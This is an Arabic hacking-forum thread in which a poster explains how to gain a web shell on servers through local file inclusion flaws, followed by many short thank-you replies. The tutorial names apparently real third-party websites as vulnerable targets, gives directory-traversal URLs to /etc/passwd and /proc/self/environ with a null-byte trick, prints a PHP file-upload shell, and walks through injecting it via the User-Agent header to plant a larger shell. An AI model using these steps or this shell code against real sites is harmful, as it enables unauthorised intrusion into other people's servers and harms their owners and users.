الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

[KaLa$nikoV]

السلام عليكم ورحمة الله وبركاته

موضوعنا اليوم عن الحصول على شل عن طريق ثغرات local file include

طبعا الثغره فعاله ومنتشره فى كتير جدا من السيرفرات

ولو دخلت على اى موقع ثغرات تلقاها اكتر من السكيول

لكن مفيش اهتمام بيها مش عارف ليه مع العلم ان استغلالاتها كتير

وانا كنت فاكر ان الطريقه معروفه لانها قديمه حبتين لكن اكتشفت ان كتير مش عارفينها

عموما نبدأ الشرح وهو سهل جدا لكن محتاج تركيز مش أكتر

الأدوات الأول

1 - متصفح فير فوكس (أكيد عند كله)

2 - إضافة mozilla sniffer

https://addons.mozilla.org/en-US/firefox/addon/176005/

3 - فتح دماغك معايا شويه بس

نبدأ الشرح

ده مثال لموقع مصاب بثغرة lfi

http://www.iowaarboretum.org/index..../../../../../../../../../../../../etc/passwd

وده موقع للتطبيق فى حالتنا

http://falalalalights.net/site/inde...../../../../../../../../../proc/self/environ

على سبيل المثال لا الحصر

نشوف هنعمل ايه

أول حاجه اعرف ان لما بتطلب ملف بى اتش بى من السيرفر فيه عمليه جديده بتبدأ وبتتحفظ فى ملف /proc خاص بيها (مش مهم)

المهم دلوقت ان السيرفرات بيبقى فيها مجلد بالعنوان ده /proc/self/environ بيحتوى على معلومات عن العمليات الأخيره اللى حصلت

احنا بقى هنعمل ايه

هنحقن المجلد ده بشل بسيط الاوا
وعن طريق الشل البسيط نرفع شل كبير

نشوف ازاى

ده المسار اللى بنجيب منه اليوزرات

http://www.site.com/index.php?optio.../../../../../../../../../../../../etc/passwd

وخلى بالك من علامة %00 اللى فى الاخر دى

مهمه جدا

طيب بعد منطلب الملف ده النتيجه هتبقى كده

[

تمام لحد كده الموقع مصاب وزى الفل

نشوف بقى /proc/self/environ متفعله او لا لانها مش موجوده فى كل السيرفرات

ازاى بقى يا حلو
هنغير /etc/passwd ب /proc/self/environ
http://www.site.com/index.php?optio...../../../../../../../../../proc/self/environ

لو كان الناتج زى كده

يبقى متفعله وزى الفل

طبعا هتلاقى كلام كتير لكن ده فى اول الصفحه وزى منت شايف محتوى على user_agent وده اهم حاجه دلوقت

طيب لو مظهرش كده وظهر فور بيدن او صفحه بيضه

يبقة كده مش متفعل وشوف سايت تانى بقى او استنى للدرس الجى هتشوف فيه مفاجأه

اوك

لقيناه متفعل هنعمل ايه

نحقن الشل تبعنا فيه وهتشوف ازاى لكن الاول حاول تنقى شل خفيف وانا هستخدم ده
مجرد فورم ابلو مش اكتر نرفع بيه الشل الكبير بتاعنا

<?php
echo '<b><br><br>'.php_u****().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">';
echo '<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_****'], $_FILES['file']['****'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

تم ارفاق الشل

نشوف بقى هنحقنه ازاى

بعد متسطب الاداه mozilla sniffer

تفتحها من الفاير فوكس عن طريق tools > mozilla sniffer

وبعدين تضغط start sniff

طبعا ناس هتقول اداة التامبر بتقضى نفس الغرض

اقولك لو جربت تغبر الاجينت بالتامبر هيديك ايرور ومش هتشتغل لكن السنيفر شغاله بدون مشاكل lol
طيب

ضغطنا start sniff
افتح بقى السايت تانى طبعا السايت ده

http://www.site.com/index.php?optio...../../../../../../../../../proc/self/environ

واختار tamper

تلقى جاك حاجه زى دى

لاحظ المحدد بازرق اللى هو user agent

حط مكانه كود الشل الموجود فوق

واتكى ok

تمام كده تلاقى الصفحه ظهر فيها فورم رفع
زى ده

لول

ارفع الشل تبعك بس وانت مشغل السنيفر برضه متقفلهاش

بعد متضغط ابلود
اضغط tamper تانى وحط نفس الكود اللى حطيته قبل كده اللى هو تبع الرفع

واضغط اوك

تمام كده انا رفعت الشل باسم faris.php

تروح بقى على السايت مباشر وتضيف يعدها اسم الشل

توضيح
انا كنت شغال هنا
http://www.site.com/index.php?optio...../../../../../../../../../proc/self/environ

يبقى الشل هنا

http://www.site.com/faris.php

والنتيجه

مبروووك

lol


انتهى الشرح
اتمنى يكون واضح
وأى استفسارات انا جاهز

HaCKeR-MaN k:
​

نسخ لصق
-------
ahmed_100022
عالم المعرفه

 

[D-GhosT s3cur!Ty-Z]

thank you

 

[Q2-FOX2R]

مشكووورين على الشرح الاكثر من رائع
بس الثغرات دي صارت نادرة
و ان وجدت ما تنفع كثير
بسبب اصدار البي آتش بي 5.x

بس تزبط بالاصدار 4.x با>ن الله

 

[the sn!per]

[align=center][/align]مشكور اخ volc4no على الشرح الرائع بانتظار جديدك دائما

 

[mobdeen]

والله شرح وافي وكافي بس ما ينفع الا مع قليل

 

[mr.ft]

مشكووووووووووور يعطيك الف عافيه

 

[hakar-mosos]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

مشكور اخي على المعلومه الحلوه

 

[Mr GbX]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

شكرا لك يا غالي
​

 

[جيم 5]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

شكرا يا عسل

 

[zero cool1]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

thxxxxxxxxxxxxxxxxxxxxxxxxxx

 

[atttt]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

a;vhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

 

[simon007]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

thxxxxxxxxxxxxxxxxxxxxxxxxxx

 

[pain sama]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

شكراا لك حبيبي الغالي !!

 

[عبد الله ر]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

مشكور اخي فولكانو

 

[ssmba]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

god men pro

 

[ChaRaF474]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

شكرا شكرا
====
ولكن شوف

2 - إضافة mozilla sniffer

https://addons.mozilla.org/en-US/firefox/addon/176005/

​

 

[londre_12]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

i7fdou khoya tnks

 

[Mr.HxH]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

thanxxxxxxxxx

 

[سـأإو]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

شكرا

 

[tayam]

رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

شكرا لك ياغالي